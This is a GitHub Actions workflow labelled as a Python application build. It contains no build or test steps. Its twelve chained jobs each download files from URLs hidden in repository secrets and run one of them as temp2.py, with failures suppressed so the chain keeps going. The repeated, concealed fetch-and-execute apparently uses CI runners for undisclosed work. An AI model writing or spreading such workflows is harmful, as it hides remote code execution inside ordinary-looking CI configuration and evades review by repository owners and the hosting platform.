name: Python application (xwan)

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  job1:
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py

  job2:
    runs-on: ubuntu-latest
    needs: job1
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job3:
    runs-on: ubuntu-latest
    needs: job2
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job4:
    runs-on: ubuntu-latest
    needs: job3
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job5:
    runs-on: ubuntu-latest
    needs: job4
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job6:
    runs-on: ubuntu-latest
    needs: job5
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job7:
    runs-on: ubuntu-latest
    needs: job6
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job8:
    runs-on: ubuntu-latest
    needs: job7
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job9:
    runs-on: ubuntu-latest
    needs: job8
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job10:
    runs-on: ubuntu-latest
    needs: job9
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job11:
    runs-on: ubuntu-latest
    needs: job10
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true

  job12:
    runs-on: ubuntu-latest
    needs: job11
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v3
        with:
          python-version: "3.13"
      - run: |
          python -m pip install --upgrade pip
          pip install upsidedown requests
          wget ${{ secrets.FILE_3 }}
          wget ${{ secrets.FILE_2 }}
          wget ${{ secrets.FILE_1 }} -O temp2.py
          python temp2.py || true
